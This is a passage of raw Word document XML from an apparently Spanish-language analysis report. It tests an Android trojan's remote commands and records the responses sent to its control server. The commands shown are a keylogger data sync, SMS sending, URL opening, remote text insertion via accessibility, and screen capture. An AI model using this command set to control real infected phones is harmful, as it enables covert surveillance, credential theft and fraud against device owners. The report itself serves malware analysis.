        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CDF27EA" w14:textId="1FA26729" w:rsidR="00FE27AD" w:rsidRPr="00100050" w:rsidRDefault="00FE27AD" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00100050">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Comando: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>server synchronize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>keylogs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280B24E9" w14:textId="4A771D91" w:rsidR="00FE27AD" w:rsidRPr="0038793B"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38793B">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Respuesta enviada al servidor</w:t>
      </w:r>
      <w:r w:rsidRPr="0038793B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0038793B">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">remoto: </w:t>
      </w:r>
      <w:r w:rsidR="00EA4B7F" w:rsidRPr="0038793B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>{"text":"[This is a test message\n]","time":"1719891061"}</w:t>
      </w:r>
      <w:r w:rsidR="00EA4B7F" w:rsidRPr="0038793B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> […] El resto de datos han sido omitidos debido a su longitud, se trata de un volcado completo de los datos de keylogger almacenados en la base de datos local del dispositivo infectado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A653825" w14:textId="77777777" w:rsidR="00FE27AD" w:rsidRPr="00BB1669" w:rsidRDefault="00FE27AD"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lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C6A215E" w14:textId="77777777" w:rsidR="00C85E4E" w:rsidRDefault="00C85E4E"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0D2A8B60" w14:textId="77777777" w:rsidR="0038793B"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color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70C02EBE" w14:textId="5FEBC4D4" w:rsidR="0038793B" w:rsidRPr="0038793B" w:rsidRDefault="0038793B" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038793B">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Comando: </w:t>
      </w:r>
      <w:r w:rsidRPr="0038793B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sms send 1234 TestSMS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD3C883" w14:textId="0C71DF3C" w:rsidR="0038793B"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r w:rsidRPr="0038793B">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Respuesta enviada al servidor</w:t>
      </w:r>
      <w:r w:rsidRPr="0038793B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0038793B">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">remoto: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>{data={"command":"sms","result":"Message \"TestSMS\" sended to [1234]","type":"1"}, store=true, type=log}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA69576" w14:textId="77777777" w:rsidR="0038793B" w:rsidRDefault="0038793B"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p>
    <w:p w14:paraId="5895C7BC" w14:textId="1DFD8827" w:rsidR="008D386B" w:rsidRPr="00075A3B" w:rsidRDefault="00000000"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Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="6B57DF0A">
          <v:shape id="Picture 238" o:spid="_x0000_s2092" type="#_x0000_t75" alt="A screenshot of a phone&#10;&#10;Description automatically generated" style="position:absolute;margin-left:135.2pt;margin-top:94.55pt;width:125.1pt;height:116.35pt;z-index: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2" o:title="A screenshot of a phone&#10;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="0038793B" w:rsidRPr="0038793B">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Resultado adicional obtenido: intento de env</w:t>
      </w:r>
      <w:r w:rsidR="00AD5E21">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ío de SMS con el destinatario y contenido indicados, en este caso ha sido detectado por parte del sistema Android y se produce una advertencia buscando confirmación mostrada a continuación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B44FAEB" w14:textId="5C8BBF82" w:rsidR="00C85E4E" w:rsidRPr="0038793B" w:rsidRDefault="00C85E4E" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D61292E" w14:textId="0413E36F" w:rsidR="000930B3" w:rsidRPr="0038793B" w:rsidRDefault="000930B3" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038793B">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Comando: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>openurl youtube.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D63DB7E" w14:textId="50BEC36B" w:rsidR="000930B3" w:rsidRPr="000930B3"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0930B3">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Respuesta enviada al servidor</w:t>
      </w:r>
      <w:r w:rsidRPr="000930B3">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000930B3">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">remoto: </w:t>
      </w:r>
      <w:r w:rsidRPr="000930B3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>{data={"command":"openurl","result":"Open [https:\/\/youtube.com] link","type":"1"}, store=true, type=log}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537596BD" w14:textId="2A49FD5A" w:rsidR="000930B3" w:rsidRPr="000930B3"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6124A002" w14:textId="7856BDAB" w:rsidR="000930B3" w:rsidRPr="000930B3" w:rsidRDefault="000930B3"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1CA3E5A0" w14:textId="4D551866" w:rsidR="000930B3" w:rsidRPr="00C259D1" w:rsidRDefault="00000000" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="5ADFFCE9">
          <v:shape id="Picture 239" o:spid="_x0000_s2091" type="#_x0000_t75" alt="A screenshot of a video chat&#10;&#10;Description automatically generated" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:59.1pt;width:102pt;height:202.3pt;z-index:41;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3" o:title="A screenshot of a video chat&#10;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="000930B3" w:rsidRPr="0038793B">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado adicional obtenido: </w:t>
      </w:r>
      <w:r w:rsidR="000930B3">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>apertura de la URL indicada en una nueva actividad del sistema, utilizando en este caso el navegador WebView Browser incluido por defecto en el sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F21BCF" w14:textId="77777777" w:rsidR="000D121C" w:rsidRPr="00AD4315" w:rsidRDefault="000D121C" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4315">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">Comando: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4315">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>accessibility insert testinput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E21A1E4" w14:textId="77777777" w:rsidR="000D121C" w:rsidRDefault="000D121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p>
    <w:p w14:paraId="4B4CA2C9" w14:textId="28629F7D" w:rsidR="000D121C" w:rsidRPr="00AD4315" w:rsidRDefault="000D121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r w:rsidRPr="00AD4315">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Respuesta enviada al servidor</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4315">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4315">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">remoto: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Sin respuesta enviada</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560DD5A1" w14:textId="77777777" w:rsidR="000D121C" w:rsidRPr="00AD4315" w:rsidRDefault="000D121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6BC96ECE" w14:textId="77777777" w:rsidR="000D121C" w:rsidRPr="00AD4315" w:rsidRDefault="000D121C"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s-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1209DA78" w14:textId="652A6712" w:rsidR="00416BFF" w:rsidRDefault="00000000" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="38CCC819">
          <v:shape id="Picture 241" o:spid="_x0000_s2090" type="#_x0000_t75" alt="A white background with black border&#10;&#10;Description automatically generated" style="position:absolute;left:0;text-align:left;margin-left:145.3pt;margin-top:127.1pt;width:114.6pt;height:226.45pt;z-index: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4" o:title="A white background with black border&#10;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="000D121C" w:rsidRPr="00494559">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Menlo"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado adicional obtenido: introducción del texto indicado en el elemento de la interfaz de usuario que está siendo utilizado en el momento. Se ha probado este comando mientras se utilizaba un navegador web para comprobar que la entrada remota de texto funciona como se espera, y </w:t>
      </w:r>
      <w:r w:rsidR="000D121C">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Menlo"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">a continuación </w:t>
      </w:r>
      <w:r w:rsidR="000D121C" w:rsidRPr="00494559">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Menlo"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>se muestra el resultado</w:t>
      </w:r>
      <w:r w:rsidR="000D121C">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Menlo"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> obtenido</w:t>
      </w:r>
      <w:r w:rsidR="000D121C" w:rsidRPr="00494559">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Menlo"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A196DD" w14:textId="5C0977AC" w:rsidR="000D121C" w:rsidRDefault="000D121C" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74CB2571" w14:textId="77777777" w:rsidR="000D121C" w:rsidRDefault="000D121C" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="036956DC" w14:textId="77777777" w:rsidR="005420D9" w:rsidRDefault="005420D9" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49E43DC5" w14:textId="555044B9" w:rsidR="00AD4315" w:rsidRPr="00301FDA" w:rsidRDefault="00AD4315" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00301FDA">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Comando: </w:t>
      </w:r>
      <w:r w:rsidRPr="00301FDA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">accessibility </w:t>
      </w:r>
      <w:r w:rsidR="000D121C" w:rsidRPr="00301FDA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>screen</w:t>
      </w:r>
      <w:r w:rsidRPr="00301FDA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000D121C" w:rsidRPr="00301FDA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8C5F3D" w14:textId="77777777" w:rsidR="00494559" w:rsidRPr="00301FDA" w:rsidRDefault="00494559"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n-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AC5E7C6" w14:textId="183E4826" w:rsidR="00301FDA" w:rsidRPr="00301FDA" w:rsidRDefault="00AD4315"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Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00301FDA">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Respuesta enviada al servidor</w:t>
      </w:r>
      <w:r w:rsidRPr="00301FDA">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00301FDA">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">remoto: </w:t>
      </w:r>
      <w:r w:rsidR="00301FDA" w:rsidRPr="00301FDA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>{data={"command":"accessibility","result":"Start screen capture","type":"1"}, store=true, type=log}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C702899" w14:textId="5559612F" w:rsidR="00AD4315" w:rsidRPr="00301FDA" w:rsidRDefault="00AD4315"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p>
    <w:p w14:paraId="05D25ABD" w14:textId="77777777" w:rsidR="00AD4315" w:rsidRPr="00301FDA" w:rsidRDefault="00AD4315"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US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EE4B8F5" w14:textId="4E360301" w:rsidR="00E67BC3" w:rsidRDefault="00AD4315" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Menlo"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00494559">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Menlo"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado adicional obtenido: </w:t>
      </w:r>
      <w:r w:rsidR="006E4619">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Menlo"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>comienzo de  una sesión de captura de pantalla de la aplicación troyano a través de la herramienta</w:t>
      </w:r>
      <w:r w:rsidR="000A5176">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Menlo"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E4619">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Menlo"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Google Cast. Previamente al comienzo se espera a que el usuario autorice la actividad  </w:t>
      </w:r>
      <w:r w:rsidR="000A5176">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Menlo"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> con una notificación de advertencia.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D886C2B" w14:textId="77777777" w:rsidR="002539AF" w:rsidRDefault="002539AF" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AB6CF89" w14:textId="77777777" w:rsidR="002539AF" w:rsidRDefault="002539AF" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79B2F11C" w14:textId="77777777" w:rsidR="002539AF" w:rsidRDefault="002539AF" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="777D28AC" w14:textId="77777777" w:rsidR="002539AF" w:rsidRDefault="002539AF" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4753FFCB" w14:textId="09E8127C" w:rsidR="002539AF" w:rsidRDefault="00000000" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="5EE905C4">
